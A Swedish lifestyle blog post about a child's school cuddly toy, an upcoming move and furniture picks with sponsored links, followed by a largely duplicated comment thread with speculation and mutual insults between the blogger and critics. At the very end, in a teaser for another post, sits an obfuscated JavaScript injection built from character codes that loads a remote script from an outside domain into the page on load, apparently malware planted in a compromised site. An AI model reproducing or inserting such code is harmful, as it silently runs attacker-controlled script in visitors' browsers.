Flytt packning, Ugglis och inredning =) Kontrollerat kaos!

 

// Inlägget innehåller adlinks // 

 

092DE688-BA3C-470C-AD04-B9B533661191

Godförmiddag!

Såhär har vi legat hela morgonen… i en hög. Sture har gottat sig, Stina som flydde bilden hat också kjelat. Ugglis är med. Och så Lilleman såklart. Myyyys ❤️ ”Ugglis” är ett gosedjur från skolan som får följa med varje elev hem en helg. Sture tycker också om ugglis ☺️ På måndag ska Ludvig få redovisa hur helgen med ugglis har varit. Vi gjorde samma sak på Kids 2 home, men då redovisade  vi b bilderna på en iPad och texten i ett block (som lilleman själv fick öva på att skriva)

Nu ska bilder skrivas ut ( ?!) och in i samma block som texten, så jag måste hitta ens skrivare någonstans innan imorgon! Men det löser sig nog 😉

fasen vad allt sånt var så mycket enklare när jag hade kontoret på My’s Blommor att lita på i alla lägen… 

OLYMPUS DIGITAL CAMERA

-Det är SÅ mycket snö på öland igen, Underbart!

Jag vet att det ställer till det på vägarna. Men allt känns så mycket ljusare och fräschare när snön ligger såhär krispigt vit och fin! Idag ska vi på äventyr. Plus att vi planerar för flytt.

Jag skulle behöva köra en bloppis igen. -Vill du det?

(Blandat träningskläder, skor, vanliga kläder osv) 

Håller på att rensa (igen) sorterar, slänga, ge bort, sälja, och försöka tänka praktiskt. I våran nya bostad är det extremt ont ed just förvaring. Så planen är jag ska bli någon dom av minimalist hehe! Jonas är tveksam till att jag lyckas..  Jag kommer byta ut en del av möblerna. Får ta lite då och då. En del av mig vill ha allt klart vid inflytt. Men mitt sunda förnuft säger att jag ska ta det lite lugnt och istället fokusera på att ta mig ur lägenheten i tid (den ska besiktas några dagar innan den sista) och sedan byta ut möbel för möbel istället. Som sagt, behöver möbler med bra förvaring och som passar in i den livsstilen som vi kommer få.. Fortsättning följer. Jag håller på att sprick inombords, jag vill berätta NU vart vi flyttar. Visa bilder osv.. Men ge mig några dagar till bara. Ludvig ska få se det först. Kontrakt och nycklar har jag redan… Så snart börjar äventyret! Jonas kämpar på med renoveringen. Jag tycker det är JÄTTE jobbigt att vara ifrån varandra såhär länge. Saknar honom massor! Nu om kvällarna så sitter jag och kollar inredning. Sittpuffar med förvaring, smarta hyllsystem osv.

Här ser du några av mina favoriter hos JOTEX 

 

 

Kuddar / Ananas / Ljusstake / Sittpuff / Soffbord / Fåtölj

Klicka på länkarna för att kika närmare på grejerna.

Jag tror att jag kommer slå till på en sittpuff, marmorbordet, och en fotölj, men i ljusrosa. Dock så var inte någon av dessa grejer särskilt bra förvarings grejer. hehe! ja, ja, vi får se…. Nu ska vi äta brunch här hemma innan vi fortsätter stuva om.

Hörs sen!

stor kram

/ My Martens 

79 Komentarer

 1. Okej! Jag gissar på att du & Jonas köpt ett hus på Öland. Nära för Lilleman o bra för bebis. Jonas reser ändå en del.
  Det är därför ni renoverar upp Jonas lägenhet för att fräscha till den innan försäljning.
  Och du vill vänta med att säga allt innan du passerat v. 12
  Right? ??❤

 2. Okej! Jag gissar på att du & Jonas köpt ett hus på Öland. Nära för Lilleman o bra för bebis. Jonas reser ändå en del.
  Det är därför ni renoverar upp Jonas lägenhet för att fräscha till den innan försäljning.
  Och du vill vänta med att säga allt innan du passerat v. 12

  Right? 😉😘❤

 3. Så spännande.
  Klart att Ludvig ska se först.
  Det där med förvaring är bekymmer ibland. Men var öppen det finns många lösningar som man hittar på många ställen.
  Tänk lite annorlunda. Fantasin har inga gränser.
  Kram L

 4. Så spännande.
  Klart att Ludvig ska se först.
  Det där med förvaring är bekymmer ibland. Men var öppen det finns många lösningar som man hittar på många ställen.
  Tänk lite annorlunda. Fantasin har inga gränser.

  Kram L

 5. Du kan väl bara berätta när du tycker det är dags och du är redo bara du som bestämmer det inget annat som hindrar dig vad jag kan förstå, istället för att skriva om det i varje inlägg ger bara onödiga spekulationer och kommentarer. Hoppas att allt blir bra i alla fall.

 6. Du kan väl bara berätta när du tycker det är dags och du är redo bara du som bestämmer det inget annat som hindrar dig vad jag kan förstå, istället för att skriva om det i varje inlägg ger bara onödiga spekulationer och kommentarer. Hoppas att allt blir bra i alla fall.

 7. Inte för å va sån, men tvättar de det där mjukisdjuret efter varje helg hos nåt barn?
  För herreminje vad basilusker det bor i den annars.

 8. Inte för å va sån, men tvättar de det där mjukisdjuret efter varje helg hos nåt barn?
  För herreminje vad basilusker det bor i den annars.

 9. Så mycket spekulationer det blir när du säger A och inte B. Bättre du väntar med info tills allt är klart. Såå tjatigt att du alltid gör så.

  • Hej Maria, Lena Ann-sofie eller vad du nu egentligen heter?
   Detta är dina senaste kommentarer härinne…
   Jag misstänker att du inte alltid mår så bra. (av det att döma gällande det du skrivit att din egen dotter kämpar mot) Jag beklagar det stort, och håller tummar och tår för att hon ska få bli frisk och få må bra <3
   Men vad det gäller dina kommentarer här inne så uppfattar jag som att din "röda tråd" alltid är att leta fel, poängtera det som är negativt och kritisera mig på i stort sett alla plan.
   Om du inte gillar det jag gör, så finns det ju såååå många andra bloggar att välja på =) Jag försöker att alltid svara gulligt på dina kommentarer, jag bemöter dig väl. Och hoppas att du ska bli positiv.
   Men ibland tröttnar även jag. Självklart får man ställa frågor och ha sina åsikter.. men du kritiserar mig som person, min frukost, min sambo, mitt te, mitt sätt att sköta bloggen… Det känns lixom inte som att du gillar mig överhuvudtaget. Varför är du här?
   Detta är dina senaste kommentarer:
   //
   "Du är alltid så välklädd men tycker att du får styla upp din kille . Han vore snyggare med andra kläder mm när ni är ute på ”galej”."
   "Jag säger då bara……vill inte skriva mer, du förstår nog vad jag menar. Du är bara 30 och håller på med sån humbug. det finns mycket kliniker kan tjäna pengar på."
   "inbilla dig inte att det teet ska vara så effektivt. Nite naivt att tro på allt.
   Ät och drick bra så behövs inget te.
   Förlåt, men det är inte elakt skrivet men varför lägga ut pengar på så mycket onödigt?"
   "Cancerforskaren heter inte Martens, han heter MERTENS !
   Å så kul det vore att se din fästman Jonas se lite glad ut och le med öppen mun. Han bara snörper på munnen på ALLA bilder. Haha…
   Roligt att se alla bilder från galan."
   "Ditt kroppsideal är ett hån mot många kvinnor ! Skärp dig. Gör nåt vettigt av din blogg och visa respekt !"
   "Ååå, pålägget på mackan ser verkligen inte aptitligt ut. Fick lite illamående när jag så den äckliga korven, eller vad det är. Men får väl hoppas den smakar bättre än vad den ser ut."
   "Har din blogg blivit en motionsblogg nu ? Gillade den bättre förut."
   "När du svarar på kommentarer låter du ofta lite bitchig ! Du kan tappa läsare på det."
   "Största myten : vitpepparkorn !"
   "Har kollat din väninnas radhus på Lidingö. 8.5 milj. för ett radhus ! Absolut inte prisvärt ."
   "”louise” jag bor själv i Sthlm, men tycker i alla fall att det är för mkt för ett radhus, även på Lidingö"
   "Så mycket spekulationer det blir när du säger A och inte B. Bättre du väntar med info tills allt är klart. Såå tjatigt att du alltid gör så."//

   • Men hjälp vilken liten bitter och patetisk människa ! om inte rent utav ELAK , undrar om hon uttalar sej om människors utseende och klädsel när hon inte gömmer sej bakom en skärm också ? så gammalmodiga och inskränkta åsikter om klädsel och utseende bland annat . och dessutom noll koll på fastighetspriserna i Stockholm ! Måste vara en väldigt gammal människa som lever kvar i hur det var före femtiotalet med allt HAHAHAHAA ! Verkligen ingen människa att ens reflektera över , men skrattar gott över dessa osunda åsikter ? Kram till dej My.

   • Så otroligt otrevlig du är. Svarar sällan direkt på frågor. Trots att du har ett förmodererat kommentarsfält, väljer du att, gång på gång, hänga ut för dig obekväma kommentarer. Varför förmoderera när du gör såhär? Men såklart är svaret – du gillar att dra på dig offerkoftan och dra nytta av stämningen. Inte konstigt att du mår psykiskt dåligt. Du lever ju på ett luftslott – en livslögn.

    • Du ”polly” med falsk mailadress och falskt id, samt svitch på IP-adress. Du känner att du inte har bättre saker än att göra än att sitta här inne och tycka illa om mig? Vet du….. Det säger mer om dig än om mig ? hehe!

    • Hej Elin! Ja… mitt liv är lite annorlunda gentemot majoriteten. (Antagligen därför den fortfarande är så aktiv) Det händer saker hela tiden. Pendlingen medför ju en del av en annorlunda livstil. Bloggen en annan, och hela media biten med blogg, podd, ect gör ju att man ställa inför nya projekt och roliga saker hela tiden ? Jag skriver bara rakt upp och ner utifrån där jag står…. om vissa av er stör sig på att jag berättar om det… Det är ju såklart tråkigt att ni känner så. Men jag skulle vara på tok för begränsad här inne om jag skulle hålla det för mig själ. Änsålänge är ju bloggen en personlig lifestyle blogg ?

 10. Så mycket spekulationer det blir när du säger A och inte B. Bättre du väntar med info tills allt är klart. Såå tjatigt att du alltid gör så.

  • Hej Maria, Lena Ann-sofie eller vad du nu egentligen heter?

   Detta är dina senaste kommentarer härinne…

   Jag misstänker att du inte alltid mår så bra. (av det att döma gällande det du skrivit att din egen dotter kämpar mot) Jag beklagar det stort, och håller tummar och tår för att hon ska få bli frisk och få må bra <3

   Men vad det gäller dina kommentarer här inne så uppfattar jag som att din "röda tråd" alltid är att leta fel, poängtera det som är negativt och kritisera mig på i stort sett alla plan.

   Om du inte gillar det jag gör, så finns det ju såååå många andra bloggar att välja på =) Jag försöker att alltid svara gulligt på dina kommentarer, jag bemöter dig väl. Och hoppas att du ska bli positiv.

   Men ibland tröttnar även jag. Självklart får man ställa frågor och ha sina åsikter.. men du kritiserar mig som person, min frukost, min sambo, mitt te, mitt sätt att sköta bloggen… Det känns lixom inte som att du gillar mig överhuvudtaget. Varför är du här?

   Detta är dina senaste kommentarer:

   //

   "Du är alltid så välklädd men tycker att du får styla upp din kille . Han vore snyggare med andra kläder mm när ni är ute på ”galej”."

   "Jag säger då bara……vill inte skriva mer, du förstår nog vad jag menar. Du är bara 30 och håller på med sån humbug. det finns mycket kliniker kan tjäna pengar på."

   "inbilla dig inte att det teet ska vara så effektivt. Nite naivt att tro på allt.
   Ät och drick bra så behövs inget te.
   Förlåt, men det är inte elakt skrivet men varför lägga ut pengar på så mycket onödigt?"

   "Cancerforskaren heter inte Martens, han heter MERTENS !
   Å så kul det vore att se din fästman Jonas se lite glad ut och le med öppen mun. Han bara snörper på munnen på ALLA bilder. Haha…
   Roligt att se alla bilder från galan."

   "Ditt kroppsideal är ett hån mot många kvinnor ! Skärp dig. Gör nåt vettigt av din blogg och visa respekt !"

   "Ååå, pålägget på mackan ser verkligen inte aptitligt ut. Fick lite illamående när jag så den äckliga korven, eller vad det är. Men får väl hoppas den smakar bättre än vad den ser ut."

   "Har din blogg blivit en motionsblogg nu ? Gillade den bättre förut."

   "När du svarar på kommentarer låter du ofta lite bitchig ! Du kan tappa läsare på det."

   "Största myten : vitpepparkorn !"

   "Har kollat din väninnas radhus på Lidingö. 8.5 milj. för ett radhus ! Absolut inte prisvärt ."

   "”louise” jag bor själv i Sthlm, men tycker i alla fall att det är för mkt för ett radhus, även på Lidingö"

   "Så mycket spekulationer det blir när du säger A och inte B. Bättre du väntar med info tills allt är klart. Såå tjatigt att du alltid gör så."//

   • Men hjälp vilken liten bitter och patetisk människa ! om inte rent utav ELAK , undrar om hon uttalar sej om människors utseende och klädsel när hon inte gömmer sej bakom en skärm också ? så gammalmodiga och inskränkta åsikter om klädsel och utseende bland annat . och dessutom noll koll på fastighetspriserna i Stockholm ! Måste vara en väldigt gammal människa som lever kvar i hur det var före femtiotalet med allt HAHAHAHAA ! Verkligen ingen människa att ens reflektera över , men skrattar gott över dessa osunda åsikter 🙂 Kram till dej My.

   • Så otroligt otrevlig du är. Svarar sällan direkt på frågor. Trots att du har ett förmodererat kommentarsfält, väljer du att, gång på gång, hänga ut för dig obekväma kommentarer. Varför förmoderera när du gör såhär? Men såklart är svaret – du gillar att dra på dig offerkoftan och dra nytta av stämningen. Inte konstigt att du mår psykiskt dåligt. Du lever ju på ett luftslott – en livslögn.

    • Du ”polly” med falsk mailadress och falskt id, samt svitch på IP-adress. Du känner att du inte har bättre saker än att göra än att sitta här inne och tycka illa om mig? Vet du….. Det säger mer om dig än om mig 😎 hehe!

    • Hej Elin! Ja… mitt liv är lite annorlunda gentemot majoriteten. (Antagligen därför den fortfarande är så aktiv) Det händer saker hela tiden. Pendlingen medför ju en del av en annorlunda livstil. Bloggen en annan, och hela media biten med blogg, podd, ect gör ju att man ställa inför nya projekt och roliga saker hela tiden 🙂 Jag skriver bara rakt upp och ner utifrån där jag står…. om vissa av er stör sig på att jag berättar om det… Det är ju såklart tråkigt att ni känner så. Men jag skulle vara på tok för begränsad här inne om jag skulle hålla det för mig själ. Änsålänge är ju bloggen en personlig lifestyle blogg 🙂

  • Verkligen ☺️ O sista avsnittet av Multimmamorna berättar vi det ? vi forsätter var och en för sig… men med inriktning på det var och en gör☺️ Min podd heter LIVSSTILSPODDEN, tillsammans mes sabina dufberg ☺️ Åzas podd kommer inom kort ☺️ Kram

 11. Orolig igen över op. Blir i april. Bukplastik! Går i vågor rädslan . Rädd att dö av narkos eller operation. Rädd att smärtan är övervidrig efter OM jag överlever. Rädd att inte kunna sköta min 2-åring. Rädd rädd rädd. Rädd att inte kunna sova med korsetteländet på mig. Rädd att reumatismen ska förvärras då jag inte kan köra min styrketräning som jag brukar. Skit i op då tycker säkert många. Men det kan jag inte heller. Hur ska jag tänka? Så ledsen å rädd!

  • Verkligen ☺️ O sista avsnittet av Multimmamorna berättar vi det 🙂 vi forsätter var och en för sig… men med inriktning på det var och en gör☺️ Min podd heter LIVSSTILSPODDEN, tillsammans mes sabina dufberg ☺️ Åzas podd kommer inom kort ☺️ Kram

 12. Orolig igen över op. Blir i april. Bukplastik! Går i vågor rädslan . Rädd att dö av narkos eller operation. Rädd att smärtan är övervidrig efter OM jag överlever. Rädd att inte kunna sköta min 2-åring. Rädd rädd rädd. Rädd att inte kunna sova med korsetteländet på mig. Rädd att reumatismen ska förvärras då jag inte kan köra min styrketräning som jag brukar. Skit i op då tycker säkert många. Men det kan jag inte heller. Hur ska jag tänka? Så ledsen å rädd!

  • Jag tycker att du ska boka en tid led läkaren och berätta precis hur du känner. Berätta om din rädsla och rådgiv med honom… 🙂 stor kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/